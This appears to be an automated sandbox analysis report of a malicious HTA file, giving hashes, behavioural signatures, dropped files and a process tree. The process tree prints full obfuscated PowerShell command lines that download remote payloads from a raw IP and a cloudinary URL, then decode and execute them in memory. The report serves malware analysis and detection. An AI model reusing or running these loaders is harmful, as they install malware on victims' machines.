Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 02:49
Behavioral task
behavioral1
Sample
83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705.hta
Resource
win10v2004-20241007-en
General
-
Target
83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705.hta
-
Size
143KB
-
MD5
b4a181ad1acd008c45ba11fd3b518ca2
-
SHA1
60b4d2b833454c10d8588a67c018498ebfe9e7f5
-
SHA256
83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705
-
SHA512
724c770c0f5e06fe62c99fc12546cd9c7f807cae7091e3386613b3c48831ee1748e70b227175fcdb183b71f52f300f208019c45d4712847ddc87ad254a572db9
-
SSDEEP
768:t1EVeI6Abum2oum2Lh5KUJDVUKhCiGVf/AwZTZGPJZ9adxfv1g4ZZZZZZZZZZZZV:tQ
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 1780 powershell.exe 6 2356 powershell.exe 8 2356 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 1780 powershell.exe -
pid Process 2356 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1780 powershell.exe 2356 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1780 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2876 wrote to memory of 3024 2876 mshta.exe 31 PID 2876 wrote to memory of 3024 2876 mshta.exe 31 PID 2876 wrote to memory of 3024 2876 mshta.exe 31 PID 2876 wrote to memory of 3024 2876 mshta.exe 31 PID 3024 wrote to memory of 1780 3024 cmd.exe 33 PID 3024 wrote to memory of 1780 3024 cmd.exe 33 PID 3024 wrote to memory of 1780 3024 cmd.exe 33 PID 3024 wrote to memory of 1780 3024 cmd.exe 33 PID 1780 wrote to memory of 2656 1780 powershell.exe 34 PID 1780 wrote to memory of 2656 1780 powershell.exe 34 PID 1780 wrote to memory of 2656 1780 powershell.exe 34 PID 1780 wrote to memory of 2656 1780 powershell.exe 34 PID 2656 wrote to memory of 2788 2656 csc.exe 35 PID 2656 wrote to memory of 2788 2656 csc.exe 35 PID 2656 wrote to memory of 2788 2656 csc.exe 35 PID 2656 wrote to memory of 2788 2656 csc.exe 35 PID 1780 wrote to memory of 2564 1780 powershell.exe 37 PID 1780 wrote to memory of 2564 1780 powershell.exe 37 PID 1780 wrote to memory of 2564 1780 powershell.exe 37 PID 1780 wrote to memory of 2564 1780 powershell.exe 37 PID 2564 wrote to memory of 2356 2564 WScript.exe 38 PID 2564 wrote to memory of 2356 2564 WScript.exe 38 PID 2564 wrote to memory of 2356 2564 WScript.exe 38 PID 2564 wrote to memory of 2356 2564 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\83fc39130474afeb1d69b21603b9e7495584741eda2ca2248db4730d4e966705.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWERSheLL -eX byPASS -nop -W 1 -C deViCeCREdENTIALdeploymEnt ; iNVOkE-ExpRESsIOn($(iNvOke-exprEsSION('[sYsteM.TEXt.eNcODING]'+[Char]58+[cHaR]58+'UTf8.gEtstring([SySTEm.conVErt]'+[ChAR]58+[Char]0X3A+'FrombAsE64STriNg('+[chAr]34+'JDRJRjZKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRkLXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFckRFRklOSXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSbG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmJQZ0Z0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBqWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbFd1WHlFSFUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBYnQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBUQncpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInVVUyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWVTUEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ0SUY2Sjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS8xMTgvZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91Z29vZC50SUYiLCIkRU5WOkFQUERBVEFcZnJlZXNpemVkcmVzc2Zvcm5hdHVyYWxiZWF1dHlpbnRoaXNjYXNlZm9yeW91LnZiUyIsMCwwKTtzdEFyVC1zbGVFcCgzKTtpbnZvS0UtZXhwckVTU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGZyZWVzaXplZHJlc3Nmb3JuYXR1cmFsYmVhdXR5aW50aGlzY2FzZWZvcnlvdS52YlMi'+[CHar]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kpknogff.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE2D1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE2D0.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2788
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\freesizedressfornaturalbeautyinthiscaseforyou.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $comicsverse = 'JGhlbGljb3Byb3RlaWQgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWV0YXBoeXRlID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskY2hvdWwgPSAkbWV0YXBoeXRlLkRvd25sb2FkRGF0YSgkaGVsaWNvcHJvdGVpZCk7JHBvb2tvbyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRjaG91bCk7JHJhbmdpbmVzcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskeGFudGhhbGluZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JFBpemFycm8gPSAkcG9va29vLkluZGV4T2YoJHJhbmdpbmVzcyk7JGhhbmdlciA9ICRwb29rb28uSW5kZXhPZigkeGFudGhhbGluZSk7JFBpemFycm8gLWdlIDAgLWFuZCAkaGFuZ2VyIC1ndCAkUGl6YXJybzskUGl6YXJybyArPSAkcmFuZ2luZXNzLkxlbmd0aDskc3ludGF4aW4gPSAkaGFuZ2VyIC0gJFBpemFycm87JGluc2FsdmVhYmxlID0gJHBvb2tvby5TdWJzdHJpbmcoJFBpemFycm8sICRzeW50YXhpbik7JHVuY2x1dHRlciA9IC1qb2luICgkaW5zYWx2ZWFibGUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGluc2FsdmVhYmxlLkxlbmd0aCldOyRjYXRhc3Ryb3BoZSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJHVuY2x1dHRlcik7JG5lcGhyb2kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjYXRhc3Ryb3BoZSk7JGNvbnZlcmJzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGNvbnZlcmJzLkludm9rZSgkbnVsbCwgQCgnMC9MV3pWcS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnJGhhc3NsZWQnLCAnQ2FzUG9sJywgJyRoYXNzbGVkJywgJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJyRoYXNzbGVkJywnJGhhc3NsZWQnLCckaGFzc2xlZCcsJzEnLCckaGFzc2xlZCcsJycpKTs=';$eyeing = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($comicsverse));Invoke-Expression $eyeing5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5008ed28ef6bda6fb1aae1b9c1b9114ac
SHA1cea726455bc63de1f13a25b528189f2f7ad5887f
SHA256e2a0dd17f7b43bfc9f64ddbfbdf753c574bec48fcd2e203e976c66b594cf3d65
SHA512c9a8a7b2d0391e782546a0b84c985566661257409f57051ce32f250f4c2d0c382fcbb1b8e5af20445c9d5aa24e7a6ec0f03188c2a064f0978f4f0679e7668e8b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5bc7cca46142740d4b20eb85568710c32
SHA16e39c072b604b97652d749659743ab1b78426f31
SHA25618951cffd355d18eaaa7c62deb3fab08f721c9a1f42f7a57a5f7fd20cc2d748e
SHA512322031b3f5e9f4d289ccb0105008cd7b39ab940426827de884636c8a4864243f9127ffe812a12afa4f7bc5d52ebd0490b7ccbf57c02f9e3571b4f3ffaabd36ff
-
Filesize
7KB
MD5a0872319f5271290005c1f32f62c29d6
SHA1b9f223ca02c304ffd4dbfdaf6cb3523c4d99f8a5
SHA2569c2282b2c8191e369f952d13422c74ef0804cfb3ccab569b1245d203318c0301
SHA512b534f55fd5b4061fdb527b7a59cfcc350e8b1a271636d3b0bde10728c3f9b734f481be42936bfb40cf5847d2798667d227329fd0dd1f30edf2048bfc98e18d77
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7VBVD25I2TC41K9W1M7D.temp
Filesize7KB
MD52fab4d3d45a373139c31fbe99d491991
SHA1d4c7ff1f7818f5ec1d4df2104c29d278993d7552
SHA2560288a21615eef564c1154b4e083a1fddde21bde7aa5b93efbaa33cb5cd396511
SHA5121d00e646b6b343eae3e9d94db471c2f3b15b49c6633ab6f8617f074cf573dc9547acafd6a456ebba48d0a46be01ecd83ae5e956d1dbca96e13331e3935792efc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5667dc3486c252c873f87794bb28b9a01
SHA1c308e543db336e6172ab4fdad90b8d034b80b4ef
SHA2567b0e4b122afeacb98e4d600d737d09d7bf0efb3bf1f88b72e017182b3c1cb72d
SHA5129b8c581460db5c64ef53846a69bae644546220dacbaa6cb60372f44c9bd6548bf2ec2a248c1f3c343fc3a4e482dd67cc09111c763498f5ff6004040134b6e9b6
-
Filesize
150KB
MD5f4fa61bb6c9f9721ded8d91d28ea7815
SHA110796e5d198b6007586d28f6eaf2e847f89ea51e
SHA256cbf1e928a1d028328afce5a494996571a51203d9c7e06ee78cd8ae1907f81f53
SHA51203cf806a49ac6fb1d739e986e81559241d2387af2bb93dd443dee04f8f7278d1cad45116c46951d1888fd43922d232e6a9f1b49139c61e961efea0d2de0b7013
-
Filesize
652B
MD57218c08b395c33fd40bf4e06072a95fb
SHA1437347f850d56ffb8291283b40cae02a54fe78f2
SHA256388475ea0134c3e5a4f6319d41d9105827b11395124a6e99f5d732fc5bb21e01
SHA5123634d3f83bf3d5a28c77c568d736460dc9000413ddc072e3336255c6daf23972f8d30f106ed5d80c0575ea2e0c9adf908f3bd36566397314c027581bf5ec4e89
-
Filesize
467B
MD5773dc6cce0b58d96f866a82999aeb27a
SHA1eb94f2107c3413b9d3b836a4a8f7fe1b5385e53c
SHA25603732294582d4d93597043d70029f05476e498d1ffa698d1c51d4c377d3d8311
SHA5121194741af23cdbe54b379f5555fa7e74f0f0287b357497cf76b63895803ef941454e4ce1c42a8d232c94262580cb62ac0f851ff5a1d9fdc52d9ed4a0ac68ce24
-
Filesize
309B
MD5b9aa4b56cddbb12e6b6ccbc253c53be3
SHA1f7e525799f8b9cb86f4a8e33dc4aee97be915a5e
SHA256588e5ae2ed7d6ba3d446629c8db255143cbcdefa19ee6107b71bb3179e89ffaa
SHA51297f4649fd7ced362a4525a54222ce744de59226bb30c74d7d894b2609bf4100b7302c0a008d4fab153187a66c67896198485d022bc71ad7303f96c0b8acc53b8